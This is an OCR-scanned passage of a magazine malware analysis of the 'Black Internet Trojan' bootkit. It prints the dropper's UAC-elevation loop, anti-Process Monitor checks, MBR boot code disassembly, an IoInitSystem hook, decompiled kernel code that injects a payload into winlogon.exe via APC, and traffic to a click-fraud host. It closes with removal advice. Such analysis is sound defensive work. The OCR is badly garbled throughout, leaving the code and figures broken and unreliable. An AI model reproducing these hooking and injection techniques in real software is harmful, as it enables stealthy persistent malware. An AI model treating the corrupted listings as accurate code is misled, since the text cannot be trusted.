if (GeLModaleFi leNaniewCO, ^Filename, 0xl04u^ 

Execlnf o . cbsi ze = 60; 
Execinfo. fMask = 0; 
Execinfo . hwnd = 0; 
Execinfo . 1 pverb = L"runas' r ; 
Execinfo . 1 pFi 1 e = ^Filename; 
Execinfo. 1 pparameters = 0; 
Execinfo . 1 pDi rectory = 0; 
Execlnf o . nshow = 0; 
Execinfo . hinstApp = 0; 



} 



// Launch of another process instance 
whi le C ! she 1 I ExecuteExW(AExeclnf o) ) ; 



return 0; 
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® U%er Account Control 



f I Do you wa n t to a Mow th e f ollowin g prog ra m from an u n kn own 
dl blish er to m a ke ch a n g es to th is com pu ter? 





Program name: 


dropper.exe 






Publisher: 


Unknown 






File origin: 


Hard drive on this computer 






Show details 






Yes 


No | 


Chanae when these notifications appear 



Figure 13. UAC warning at installer launch. 
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Finally, the installer detects an active Process Monitor utility by looking up the specific value of win- 
dow class. It is performed just before the installation of boot code to the disk: 



.text 


00402335 


sub_ 


.402335 


proc 


near 




.text 


00402335 






push 


0 


1 pwi ndowNaiie 


.text 


00402337 






push 


offset className 


"PROC M ON_W I N D0W_C LASS" 


.text 


00402 3 3C 






call 


ds : Fi ndtari ndoww 




.text 


00402342 






fieg 


eax 




.text 


0040234-1 






sbb 


eax, eax 




.text 


00402346 






neg 


eax 




.text 


00402343 






retn 






.text 


00402343 


sub_ 


.402835 


endp 







Unlike other known bootkits, which store their components in 63 sectors before the first partition, the 
Black Internet Trojan stores its components in unlabeled area immediately after the last partition. 



"create Fi I e 
Di sposi tion 
'Read File", 
Device loco 
ReadFile'\ 
wri teFi le n 
Read File", 
wri teFile" 
wri teFi le n 
Read File", 
ReadFile", 
Read File", 
wri teFi le" 
wri teFi le n 
wri teFi le n 
Read File", 
wri teFi le n 
wri teFi le n 
"Read File", 
wri teFi le M 
T wri teFi le n 
Read File", 
'wri teFi le ft 
wri teFi 1 e n 
"ReadFile", 
wri teFi le" 
'wri teFi le n 
Read File", 
"wri teFi le" 
'wri teFi le" 
'closeFi le" 



"\Devi 
: open" 

*\Devi 
ntrol" r " 
"\Devi 
"\Devi 
"\Devi 
"\Devi 
"\Devi 
"\Devi 
"\Devi 
"\Devi 
"\Devi 
"\Devi 
"\Devi 
"\Devi 
"\Devi 
"\Devi 
"\Devi 
"\Devi 
"\Devi 
"\Devi 
"\Devi 
"\Devi 
"\Devi 
"\Devi 
"\Devi 
"\Devi 
"\Devi 
"\Devi 
"\Devi 



ce\Harddi sk0\DR0" , "Desired Access: Generic Read/Write, 



ceMiarddi 
\Devi ce\H 
ceMnrddi 
ce\Harddi 
ce\Harddi 
ce\Harddi 
ce\Harddi 
ce\Harddi 
ce\Harddi 
ce\Harddi 
ce\Harddi 
ce\Harddi 
ce\Harddi 
ce\Harddi 
ce\Harddi 
ce\Harddi 
ce\Harddi 
ce\narddi 
ce\Harddi 
ce\Harddi 
ce\Harddi 
ce\Harddi 
ce\Harddi 
ce\Harddi 
ce\Harddi 
ce\Harddi 
ce\Harddi 
ce\Harddi 
ce\Harddi 



sk0\DR0" . "offs 
arddi skOXDRO 



Sk0\DR0 
Sk0\DR0" 
SkOXDRO" 
skOXDRO" 
skOXDRO" 
SkOXDRO" 
SkOXDRO" 
SkOXDRO" 
SkOXDRO" 
SkOXDRO" 
SkOXDRO" 
SkOXDRO" 
SkOXDRO" 
SkOXDRO" 
SkOXDRO" 
SkOXDRO" 
SkOXDRO" 
SkOXDRO" 
SkOXDRO" 
SkOXDRO" 
SkOXDRO" 
SkOXDRO" 
SkOXDRO" 
SkOXDRO" 
SkOXDRO" 
SkOXDRO" , 
SkOXDRO" 



"Off 5 

"offs 
"of fs 
"offs 
"offs 
"offs 
"offs 
"offs 
"offs 
"of Is 
"D? I s 
"offs 
"offs 
"offs 
"offs 
"offs 
"offs 
"offs 
"offs 
"offs 
"offs 
"offs 
"offs 
"offs 
"offs 
"offs 



et: 0 
com 
et: 3 



et : 
et : 
et : 
et : 
et : 
et : 
et : 
et : 
et : 
et : 
et : 
et : 
et : 
et : 
et : 
et : 
et : 
et : 
et : 
et : 
et : 
et : 
et : 
et : 
et : 



p Length 
rol: ioctl 
216 p 310 
216 p 310 
216 p 310 
216 p 310 
2 IS, 344 
Length 
216 p 310 
216 p 310 
216 p 310 
216 p 310 
Length 
216 p 310 



216 p 310 
216,311 
216 p 310 
216 p 310 
216 ,357 
216 p 310 
216 p 310 
216,396 
216 p 310 
216 p 310 
216,421 
216 p 310 
216 p 310 
216,453 



512" 

_DI5K_GET_ 
272 , Length 
Length 
Length 
Length 
Length 



272 
272 
272 
064 

512 
272 
272 
272 
784 

512 
272 
272 
296 
272 
272 
564 
272 
272 
800 
272 
272 
383 
272 
272 
120 



LerigLh : 
Length : 
Length ; 
LerigLh : 

LerigLh : 
LerigLh : 
LerigLh : 
LerigLh : 
LerigLh : 
LerigLh : 
LerigLh : 
LerigLh : 
LerigLh ; 
LerigLh : 
LerigLh : 
LerigLh : 
Length : 
Length : 
LengLh : 



LENGTH_INrO" 
512" 
512" 
512" 
512" 
43, 520" 

512" 
512" 
512" 
512" 

512" 
512" 
32 , 768" 
512" 
512" 
9,216" 
512" 
512" 
25 ,088" 
512" 
512" 
31,232" 
512" 
512" 
512" 



The bootkit's booting sector defines the location of this unlabeled area while reading the MBR- 
located partition table. Then the bootkit reads the 64 sectors with all the other components of the 
bootkit. 



segOOO :G01F xor east, eax 

segOOQ:Q022 ntov si , 7BEh ; si - pointer to partition table 

segOOO :G025 ntov cl, A ; Amount of records in partition 

table 



seg000r0031 loc_31: 
seg000;Q031 
segOOO :G035 
seg000rG037 
partition to eax 
segOOO :Q03B 
size in sectors 
seg000;G03F loc_3F: 
seg000^G03F 
segOOO :Q042 
table 

segOOO: 0044 
segOOO r 0047 
segOOO rQ049 
started 
segOOO :004D 
seg000;0050 
being read 
segOOO;0053 

13n interrupt (AH=42i) 

segODO'0056 

seg000;G05S 

seg000:0059 

segOOO ;G05A 



cmp 

jb 

ntov 

add 



add 
I oop 

or 

add 

ntov 
ntov 

cal I 

jb 

nop 
nop 
3 imp 



[si+SJ , eax 
short loc_3F 

east, [si+SJ ; set number of first sector of 
east, Lsi+Gch] ; summarize it with partition's 



si , 10 h 
1oc_31 

eax, eax 
short loc_5F 
eax , 2 

cx, 40h 
bx, 7C00h 

sub_Al 

short loc_5F 



; Go to a next record in partition 



; sector where reading should be 

; Amount of sectors being read 
; Memory address to write data 

; Function that reads data with 



far ptr 0:7C00h ; Transfer control to read code 
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Then the bootkit performs a series of standard 
actions that were described in the analysis of 
the previous 2 malicious programs: 

• Reservation of 4 kB in the base memory. 

• Interception of the 13h interrupt. 

• Signature search and modification of the 
OSLOADER.EXE code in int 13h handler. 

• Reading and execution of the boot code of 
the system partition. 

Next, we will examine the bootkit's protected 
mode code called from the modified 
OSLOADER.EXE module. 



Protected mode code 

The bootkit's protected mode code initializes 
the kernel mode driver loader. The following 
operations are performed for this purpose: 

• Signature analysis of the nt!Phase1 Initializa- 
tion() function and detection of the ntllolnit- 
System() function entry point. 

• Replacement of the nt!lolnitSystem() call 
with bootkit's driver loader call. 

• Copying the loader code into the area of 
memory right after the OS kernel. 

The address of _BILoaderBlock structure, 
which contains a pointer to the list of loaded 
modules, is located by signature in the 
OSLOADER.EXE code. 



segOOl ;Q0G069D4 sub 

segOOl ;G0G069[>B ca ! I 
address 

segOOl :Q0G0G9DD mov 

segOOl: 000069 E2 rep 

segOOl :000069E4 sub 

segOOl ;Q0G069E7 mov 

segOOl :Q0G069EB and 

segOOl :Q0G069Fl mov 
_B 1 LoaderB lock 
segOOl ;Q0Q069F3 loc_69F3: 

segOOl ;Q0Q069F3 scasb 

segOOl :Q0G069F4 jnz 

segOOl: 000069 f6 cmp 

segOOl ;Q0G0G9FC jnz 
segOOl :G0G069FE loc_69FE: 

segOOl :Q0G069FE mov 

segOOl ;Q0Q06AQ0 scasb 

segOOl ;Q0G06A01 jnz 

segOOl :Q0G06AG3 mov 
_Bl LoaderB lock 

segOOl ;QOQ06AQ5 mov 

segOOl '00006A07 mov 
_LDR_DATA_TABLE_ ENTRY for a kernel 

segOOl '00006A09 mov 
address 

segOOl r00006A0C mov 

segOOl r00006A0F mov 
image (si zeof image] 

segOOl '00006AI3 call 
nt ! loini tsysternC.) call in nt ! Phasell 

jnz 
mov 



dword ptr L espj , £ 

sub_6BB4 ; Get driver loader 



ecx , 5 
movsb 

esi , 6 

edi , [esp-i-2ch] 
edi , OFFFOOOOOh 
al , 0c7h 



; {.is saved in esi} 



; signature search for 



short loc_63F3 

dword ptr [edij, 4Q0Q3446h 

short loc_69F3 



segOOl :00006A1S 
segOOl :00006a1a 
instruction call nt ! loini t.5ystem() 

segOOl r00006AlC lea 

segOOl :Q0G06A20 mov 

segOOl: 00006A2 3 add 

segOOl '00006A25 jmp 



a I , OAlh 

short loc_63FE 
eax, [edi] 

eax, [eax] 
eax, [eax] 

edi , [eax+18h] 

ecx, [edi +3chJ 
ecx, [ecx-i-edi -i-SOhJ 

sub_6B3D 
ni tializationQ code 

short loc_6A66 
edx, [ebx] 

edx, L^bx-i-edx-i-4J 
L e si +0AhJ r edx 
edi , ecx 
short loc_6A36 



eax - pointer to 



eax 
edi 



kernel loadind 



ecx - size of kernel 
search for 
{is saved in edx) 
Relocation of original 



segOOl 


:G0G06A36 loc_6A36: 








segOOl 


:G0G06A36 


add 


edi , 


OFFFh 


segOOl 


: 00006 A3C 


and 


edi , 


QFFFF 


segOOl 


;G0G06A42 


sub 


edi , 


800h 


segOOl 


;G0G06A4S 


mov 


ecx. 


6A3h 


segOOl 


:00006A4D 


push 


edi 




segOOl 


:00006A4E 


rep 


movsb 




to the 


area of memory right 


after os 


kernel 




segOOl 


:00006AS0 


pop 


edi 




segOOl 


:00006AS1 


add 


edi , 


OEh 


segOOl 


'00006AS4 


sub 


edi , 


ebx 


segOOl 


:00006AS6 


sub 


edi , 


4 


segOOl 


:00006AS9 


mov 


[ebx J 


. edi 


nt ! iolm tsysternC) call 








segOOl 


:G0G06A5B 


xchg 


esi , 


edi 


segOOl 


;G0006A5D 


mov 


ecx. 


644h 


segOOl 


:00006A62 


sub 


edi , 


ecx 


segOOl 


;00006A54 


rep 


stosb 





; copying driver loader 



Modification of 
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The previous listing contains an algorithm for 
the installation of lolnitSystem() function hook. 
Let's take a closer look at the interception fo- 



ri L ! Phaselini Li a I i zati on+OxSal: 



S06B5fc9 6a4b push 

S0685fcb 6al9 push 

SOeSSfcd eS3B77e6ff ca I I 

S06B5fdZ ffb590fbffff push 

S06B5fd8 eS59HG000 ca I I 

S06S5 fdcl 84c0 test 



nt ! Phaselini ti a I i zati cm+0x9al: 

S06B5fc9 6a4b push 

S0685fcb 6al9 push 

S06B5fcd eS3B77e6ff call 

S0685fdZ ffb590fbffff push 

S06B5fdB e&319BG<10Q call 

S06B5fdd 84c0 test 



Driver loader 

The kernel mode driver loader performs the 
following operations: 

• Restores the original nt!lolnitSystem() call in 
a code of nt!Phase1 Initialization) function. 

• Calls nt!lolnitSystem() with repeated transfer 
of control to the driver loader via a replaced 
return address in a stack. 

• Searches for the OS kernel load address by 
a first vector in the interrupt table. The ad- 
dress of this table is obtained by using the 
sidt instruction. 

• Searches by signature for the address of the 
kernel global variable ntlPsLoadedModuleList 
- a list of kernel mode loaded modules. Par- 
ticularly, the ntlPsLoadedModuleList address 
is obtained from a pointer to this variable in a 
code of unexported nt!lopWriteDriverList() 
function. 

• Looks up the following exported functions 
and kernel variables addresses by their name 
hashes: ExAllocatePool, ExFreePool, 
KeLoaderBlock, NtClose, NtCreateFile, 
NtReadFile. 

• Reads the kernel mode driver from the unla- 
beled area at the end of a disk. 



self. The code of the nt!Phase1 lnitialization() 
function before the modification: 



4Bh 

19h 

nt! I nbvsetProg res s&a r subset 
dword ptr [ebp-470h] 
nt! loini tsystem 
al p al 



A B - 1 
19h 

nt! I nbvsetProg res sBa r subset 
dword ptr [ebp-'IZQh J 
BOecfSOe 
a 1 s a I 



• Sets up an executable driver image and 
transfers control to its entry point. 

• Returns control to nt!Phase1 lnitialization(). 
Driver and payload 

The bootkit's driver is used for the injection of 
user-mode code into the winlogon.exe proc- 
ess. For this purpose it creates a system 
thread which polls the process list in a cycle, 
analyzing two-linked lists of the .EPROCESS 
kernel and looking for the required process by 
the name of the executable file. 

Offsets of the required fields for the _E- 
PROCESS and _ETHREAD structures are 
stored in global variables with the values be- 
ing initialized according to the version of the 
operating system kernel. The value of the ker- 
nel version can be obtained with 
PsGetVersion/RtlGetVersion functions. 

Here you can see the pseudocode of a func- 
tion, which searches the process by name. 

After getting the pointers to the necessary 
process and its valid thread, the kernel mode 
driver reads the Trojan's user mode code from 
the unlabeled area of a disk and injects it in 
the winlogon.exe process. 



The code of the nt!Phase1 InitializationQ function after the modification: 



www. i nsecu remag .com 



89 



// function, which searches process by name {returns pointers to .EPROCESS and 

_ETHREAD) 

signed int stdcal 1 sub_113EC(const char *ProcessName , i nt a2 P int a3) 

( 

int ProcessEntry ; // esiOl 

peprocess currentProcess ; // eaxEl 

int ThreadListstart; // ediOS 

int ThreadEntry; // esi @S 

int Thread; // eax§9 

unsigned int Teb; // eax(&12 

int ProcessListstart ; // |_sp+lShJ Lbp+ch]@l 

*(_dword *)a2 = 0; 
*(_oword *5a3 = 0; 

// gets pointer to a list of active processes from .EPROCESS structure of 
current process 

currentProcess = ioGetcurrentProcessO ; 

ProcessEntry = (i nt) f(char *)cu rrentProcess + EPROCE5S_Acti veProcessLi nks) ; 
ProcessLi ststart = (i nt) ({char *)cu rrentProcess + 
EPR0CES5_Acti veProcessLi nks) ; 

// lists all active processes and searches necessary executable file by nane 
while ( ! * (-BYTE (ProcessEntry + EPROCES5_imageFi leName) II 
stri cnip{ProcessName P (const char ^{.ProcessEntry + 
eproces s_iTiage Fi leName))) 
( 

ProcessEntry = * (_DWORD *)ProcessEntry ; 
if (ProcessLi ststart == ProcessEntry) 

// last record in a list (necessary process is not found) 
goto LABEL_7; 

> > 

*(_dword *)a2 = ProcessEntry - EPROCE5S_Acti veProcessLi nks ; 

LABEL_7 : 

if C* (_[>word *)aZ) 
( 

// gets a pointer to the list of threads of found process 
ThreadEntry = *( _dword A ) (EPROCES5_ThreadLi sthtead + ProcessEntry); 
ThreadListstart = ThreadEntry; 

// lists all process threads 
do 

Thread = ThreadEntry - ETHREAD_ThreadLi stEnt ry ; 

* (_ DWORD *)a3 = ThreadEntry - ETHREAD_Th readLi stEntry; 

if (byte_136c0) 

// checks integrity of thread environment block (_teb) 
Teb = * (-DWORD *) (Thread + 0x20); 
if {Teb && Teb < (unsigned i nOMinsysteinRangestart) 
return 1; 

el se 

{ 

fj thread should be system thread 
if (! PsissystemThread (Thread] ) 
return 1; 

1 

ThreadEntry = * {.DWORD *)Th readEntry ; 

> 

^ while {ThreadEntry != ThreadListstart); 
return 0; 
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signed int stdcall sub_114B2 (i nt Thread, i nt Process) 



( 

signed int result; // eax@2 

char Ape; // L^p+4hJ Lbp-68foJ@5 

char Apcstate; // [sp+34hj Lbp-3ShJ(&7 

L arg e_i n te G E R Timeout; // [sp+4chj Lt>p-20h J^9 

int v7; // Lsp+54hJ Lt>p-18hJ @5 

void *payload; // Lsp+SShJ Lbp-14hJ^ 

ulong A Mocationsi ze ; // [sp+5chj Lbp-10h]&4 

pvoid BaseAddress ; // l'sp+60h| I bp-ch J @1 

handle EventHandle; // Lsp+G4hJ Lbp-ShJ^l 

handle Handle; // [_sp+68h] Lbp-4hJSl 

BaseAdd res 5 = 0; 
EventHandle = 0; 
Handle = 0; 

// gets process descriptor by pointer to _eprocess 

if (obopenobjectByPoi nter (Process , 512, 0, 0, PsProcessrype , 0 r ^Handle) < 0) 
return 0; 

if (byte_13709 == 1) 
{ 

// reads user- operating mode code from disk 

if (sub_llACECFi lenandle r dword_136cc, &byte„1370A, (i nt)&Pay I oad , 
(int)firAl locationsize) != 2) 

t 

zwc I ose(Hand I e) ; 
return 0; 

else 
{ 

Al locationsize = 1700; 
Pay I oad = fiunk_13000; 

v7 = Qx2AEu; 

// allocates virtual memory in process' address space 

if (zwa! locatevirtuaNemory{ Handle, ^BaseAddress , 0, &A I I ocati onsi ze r 4096u r 
64u) < 0 I I 

zwAl locateVirtuaNemory (Handle, fiBaseAddress , 0 r (PULONG)&v7 r OxlOOOu, 04u] 

<» t 

zwc lose {Hand 1 e) ; 
result = 0; 

e I se 

zwclose(Handle) ; 

// connects to address space of target process 
KestackAttachProcess C Process r ^Apcstate) ; 

if (zwcreateEvent(4EventKandle r 0xlF0003u r 0, synchroni zationEvent , 0) >= 0) 

dword_13704 = ( i nt) EventHand 1 e ; 
dword_13B0E = 0; 
dword_1392A = 0 
dword_1392E = 0 

memcpyCBaseAdd ress , Pay I oad , Al I ocati onsi ze) ; 
memcpyCBaseAddress, &unk_13700, 0x24 cu ] ; 

fl C(-WORD *)BaseAddress + 294) = *({_WQRD *)tfunk„13700 +■ 294); 

// initializes apc for current thread of target process 
KeinitializeApc(&Apc r Thread, 2, sub_11498 I 0, ease Address, l s 0); 

// launches APC and executes injected code 
if ((unsigned i nt8)KelnsertQueueApc(&Apc , 0 , 0, 0)) 

// sets kthread: : Apcstate . userApcPendi ng to true 
* (_BYTE *) (KTHREAD_Apcstate + Thread + 0x16) = 1; 
Timeout .Hi ghPart = -1; 
Timeout. LowPart = -300000000; 

// waits for APC completion 

zwwai tForsi ngleobject(EventHandl e r 0, &Ti meout) ; 

// disconnects from address space of target process 
^ KeunstackDetachProcessC&Apcstate) ; 

if (EventHandle) 

zwc I oseCEventHandl e) ; 

result = 1; 

> 

return result; 
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The user mode code launches the Trojan 
process with the payload. The corresponding 
module is stored in the C:\System Volume 
lnformation\Microsoft\services.exe file, which 
is created by installer at the bootkit's installa- 
tion. 



In turn, the Trojan process works like a 
"clicker": it requests configuration information 
from the weathertalkz.com website and then 
performs multiple jumps to Ad banners in the 
Internet Explorer process within a hidden 
window. 



Destination 


Protocol 


Ho 




17S. 17. 162. 242 
178.17.162. 242 


HTTP 
HTTP 


GET /banner3. php?q=5011. 5011. 2000. 0. 
GET /banner 2. php?q=5011. 5011. 2000. 0. 


0.4f ac4dc372 
0.4fac4dc372 


192.168. 88.148 


nur 


HTTP/1.0 200 OK (appl i cati on/octet - 


stream) 


85.17. 211.165 


HTTP 


get /banner. php?aff_i d=10682 http/1. 


1 


192.168. 88.148 


HTTP 


HTTP/1.1 404 Not Found (text /html ) 




69. 50.192. 52 


HTTP 


get /index. php?aff_i d=24080 http/1. 1 




192. 168. 88. 148 


HTTP 


HTTP/1.1 200 OK (text/htnfl) 





Figure 14. Requests for configuration information from weathertalkz.com. 



Conclusion 

The increased development of malicious 
bootkits seems to point to the fact that mal- 
ware developers are coming to the end of the 
road when it comes to traditional methods of 
malicious code startup. The MBR infecting 
technique is still badly handled by antivirus 
software, and is thus extremely attractive to 
malware developers. 



The good news is that the current bootkits that 
can be found in-the-wild are quite limited 
when it comes to their self-protection capabili- 
ties. It means that a typical malicious bootkit 
can still be removed by simply restoring the 
original MBR. This can be achieved by using 
the standard Microsoft tool 'fixmbr' or, alterna- 
tively, 'Bootkit Remover', which can also de- 
tect changed or hidden MBR code , and dump 
it. 
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